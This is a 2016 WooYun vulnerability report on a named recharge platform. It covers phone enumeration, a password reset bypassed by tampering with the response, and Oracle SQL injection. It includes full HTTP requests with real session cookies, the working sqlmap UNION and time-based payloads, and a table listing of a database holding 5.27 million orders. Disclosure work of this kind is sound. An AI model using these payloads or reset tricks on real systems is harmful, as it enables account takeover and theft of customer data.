当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0208646

漏洞标题:19e某平台任意用户密码重置/手机号遍历/SQL注入(涉及500w订单信息)

相关厂商:北京一九易站电子商务有限公司

漏洞作者: 路人甲

提交时间:2016-05-14 23:19

修复时间:2016-06-30 14:30

公开时间:2016-06-30 14:30

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-05-14: 细节已通知厂商并且等待厂商处理中
2016-05-16: 厂商已经确认,细节仅向厂商公开
2016-05-26: 细节向核心白帽子及相关领域专家公开
2016-06-05: 细节向普通白帽子公开
2016-06-15: 细节向实习白帽子公开
2016-06-30: 细节向公众公开

简要描述:

扫某网站C段的时候,发现了这个平台,然后测试了一波,目测问题还有一堆

详细说明:

http://g.19e.cn/login/index.jsp
#手机号遍历

b5.png


获取短信验证码时抓包

b4.png


#密码重置
输入用户名lijing,验证码随便输入,抓包

POST /smsAction_validateShortMessage.do?mobileNum=15516777178&dxyzm=1234 HTTP/1.1
Host: g.19e.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://g.19e.cn/zhmm/zhmm_index.jsp
Cookie: SSOID=A0E6616917B86A70FBCA454845FC375D-n1; SSAID=2836F7AAEF7DCC4ED40D98F486CE0CD0-n3; JSESSIONID=jWY41CQuJZRZ9rhnY3zG.199
X-Forwarded-For: 8.8.8.8'
Connection: close
Content-Length: 0


b1.png


将返回的包改为0

w1.png


w2.png


lijing/wooyun


漏洞证明:

#SQL注入
注入点在账户名称和员工姓名处

b2.png


POST /account_queryList.do HTTP/1.1
Host: g.19e.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://g.19e.cn/account_queryList.do
Cookie: SSOID=A0E6616917B86A70FBCA454845FC375D-n1; SSAID=2836F7AAEF7DCC4ED40D98F486CE0CD0-n3; JSESSIONID=yzH9LFXcgruwY7a9qcgE.199
X-Forwarded-For: 8.8.8.8'
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
addCount=20&account.accountName=DSD&account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1


Place: POST
Parameter: account.accountName
    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: addCount=20&account.accountName=1%' UNION ALL SELECT NULL,NULL,CHR(58)||CHR(122)||CHR(98)||CHR(117)||CHR(58)||CHR(117)||CHR(75)||CHR(78)||CHR(122)||CHR(119)||CHR(72)||CHR(77)||CHR(106)||CHR(112)||CHR(79)||CHR(58)||CHR(100)||CHR(116)||CHR(112)||CHR(58),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- &account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1
    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: addCount=20&account.accountName=1%' AND 3610=DBMS_PIPE.RECEIVE_MESSAGE(CHR(122)||CHR(120)||CHR(114)||CHR(81),5) AND '%'='&account.realName=&temStatus=-1&account.startTime=&account.endTime=&flag=1
---
back-end DBMS: Oracle
available databases [7]:
[*] CTXSYS
[*] EXFSYS
[*] MDSYS
[*] OLAPSYS
[*] STOCKWEB
[*] SYS
[*] SYSTEM
Database: STOCKWEB
[60 tables]
+---------------------------+
| BXY                       |
| GHC_BAK_20130801          |
| GHC_BAK_20130802          |
| GHC_BIH_STAT_INFO         |
| GHC_BIH_STAT_RULE         |
| GHC_CHANNEL_AUTO_DISCOUNT |
| GHC_CHANNEL_DISCOUNT      |
| GHC_CHANNEL_INFO          |
| GHC_CHANNEL_MAPPING       |
| GHC_CHANNEL_SUPPORTCITY   |
| GHC_CHANNEL_SUPPORTMONEY  |
| GHC_CHANNEL_WARNINFO      |
| GHC_CODE_CITY             |
| GHC_CODE_PROVINCEINFO     |
| GHC_MODIFY_CHANNEL_LOG    |
| GHC_ORDER_COUNTERACT      |
| GHC_ORDER_INFO            |
| GHC_ORDER_INFO_CF201208   |
| GHC_ORDER_INFO_HIS        |
| GHG_CHANNEL_DETAIL        |
| GHG_CHANNEL_ERROR_INFO    |
| GHG_CHARGEORDER           |
| GHG_MANUAL_RECORDS        |
| GHG_REQUEST               |
| GHG_USERDETAIL            |
| GHK_CITY                  |
| GHK_DISTRICT              |
| GHK_LEVEL                 |
| GHK_LOWESTSALEPRICE       |
| GHK_LOWESTSALEPRICE_RULE  |
| GHK_MODIFYMONEY_REVIEW    |
| GHK_ORDER_REVIEW          |
| GHK_PRODUCT_TASK          |
| GHK_PROVINCE              |
| GHK_TRANSACTION_VOLUME    |
| GHM_ACCOUNT               |
| GHM_ADMIN                 |
| GHM_BAK_0811              |
| GHM_BAK_0812              |
| GHM_CHECKORDER            |
| GHM_DELETEUSERS           |
| GHM_DELETEUSERTEMP        |
| GHM_LETTER                |
| GHM_MENU                  |
| GHM_NOTICE                |
| GHM_OPERATELOG            |
| GHM_PHONE_VALIDATE        |
| GHM_REVELSALREFUND        |
| GHM_SAFESET               |
| GHM_USERREADNOTICELOG     |
| GHM_USERS                 |
| GHM_USERS_ALTERLOG        |
| GHM_USER_MENU             |
| GHM_WALLETINFO            |
| GH_NTY_TEMPLATE           |
| HF_ACCSEGMENT             |
| MSG_SEND_DETAIL_INFO      |
| MSG_SEND_MANAGER_INFO     |
| TEST_1015                 |
| T_USER                    |
+---------------------------+


Database: STOCKWEB
+----------------+---------+
| Table          | Entries |
+----------------+---------+
| GHC_ORDER_INFO | 5270414 |
+----------------+---------+

修复方案:

求20rank

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:13

确认时间:2016-05-16 14:23

厂商回复:

确认漏洞确实存在,正在修复。

最新状态:

暂无